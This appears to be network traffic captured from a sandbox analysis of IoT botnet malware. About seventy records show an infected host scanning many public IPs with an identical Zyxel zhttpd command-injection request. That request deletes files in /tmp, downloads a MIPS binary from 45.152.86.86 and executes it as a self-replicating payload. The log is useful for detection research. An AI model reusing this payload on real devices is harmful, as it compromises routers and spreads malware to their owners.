                              Session IDSource IPSource PortDestination IPDestination Port
                              207192.168.2.133994044.165.202.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480209112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              208192.168.2.1340898183.49.151.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480237007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              209192.168.2.1337558129.194.83.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480288982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              210192.168.2.1357242103.226.160.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480333090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              211192.168.2.1339956126.114.224.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480370045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              212192.168.2.133981299.138.15.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480426073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              213192.168.2.1356226128.5.166.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480473042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              214192.168.2.1356874186.133.236.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480509996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              215192.168.2.13354824.90.147.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480536938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              216192.168.2.1357248144.45.30.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480603933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              217192.168.2.1346970159.91.99.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480645895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              218192.168.2.1349186192.105.81.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480679989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              219192.168.2.135758839.237.52.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480726004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              220192.168.2.1337290142.232.0.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480743885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              221192.168.2.1344014156.229.214.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480817080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              222192.168.2.1335756172.70.175.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480851889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              223192.168.2.1347850138.61.97.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480887890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              224192.168.2.1348652108.176.18.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480954885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              225192.168.2.1338212181.196.47.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480972052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              226192.168.2.1353968134.58.124.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481018066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              227192.168.2.1358948167.244.195.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481060982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              228192.168.2.133999866.115.24.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481096983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              229192.168.2.1353226209.147.12.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481134892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              230192.168.2.134603012.246.63.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481179953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              231192.168.2.133535652.195.147.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481210947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              232192.168.2.1360174171.160.61.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481276989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              233192.168.2.133430674.180.244.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481297016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              234192.168.2.1347386205.30.163.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481344938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              235192.168.2.1342980116.248.84.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481383085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              236192.168.2.135480663.22.72.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481410980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              237192.168.2.1357418100.38.252.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481446028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              238192.168.2.1358122110.73.131.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481473923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              239192.168.2.1334144217.14.211.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481534004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              240192.168.2.135691486.7.241.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481553078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              241192.168.2.134869690.223.77.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481611013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              242192.168.2.1338664114.7.2.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481646061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              243192.168.2.1347820120.181.124.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481683969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              244192.168.2.134903073.51.124.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481719017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              245192.168.2.1333982150.229.47.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481776953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              246192.168.2.13363488.252.131.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481817007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              247192.168.2.1333226198.129.39.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481839895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              248192.168.2.136064844.186.77.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481889963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              249192.168.2.1354702139.254.219.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481924057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              250192.168.2.133503890.1.9.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.481956959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              251192.168.2.134347224.5.35.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482004881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              252192.168.2.1342818209.231.54.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482058048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              253192.168.2.1335088119.14.145.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482089043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              254192.168.2.1341112174.90.186.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482109070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              255192.168.2.1357824153.53.241.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482162952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              256192.168.2.13565168.58.48.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482232094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              257192.168.2.1354742204.164.232.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482259989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              258192.168.2.133862888.186.108.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482302904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              259192.168.2.134287253.58.22.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482338905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              260192.168.2.1340148135.22.114.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482400894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              261192.168.2.136006898.93.82.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482439041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              262192.168.2.1333678203.165.175.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482479095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              263192.168.2.1352752182.128.150.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482510090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              264192.168.2.134865494.22.127.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482553005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              265192.168.2.1356932172.50.203.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482583046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              266192.168.2.1358602110.112.41.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482654095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              267192.168.2.133734418.71.18.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482678890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              268192.168.2.1333322123.185.118.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482723951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              269192.168.2.1337838129.170.187.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482774019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              270192.168.2.1340002102.127.180.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482803106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              271192.168.2.1355386160.55.15.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482845068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              272192.168.2.133433818.6.19.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482871056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              273192.168.2.1355282120.51.41.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482924938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              274192.168.2.1350776171.0.58.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482952118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              275192.168.2.1341200197.145.226.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.482996941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              276192.168.2.134717049.10.154.79443
                              TimestampBytes transferredDirectionData
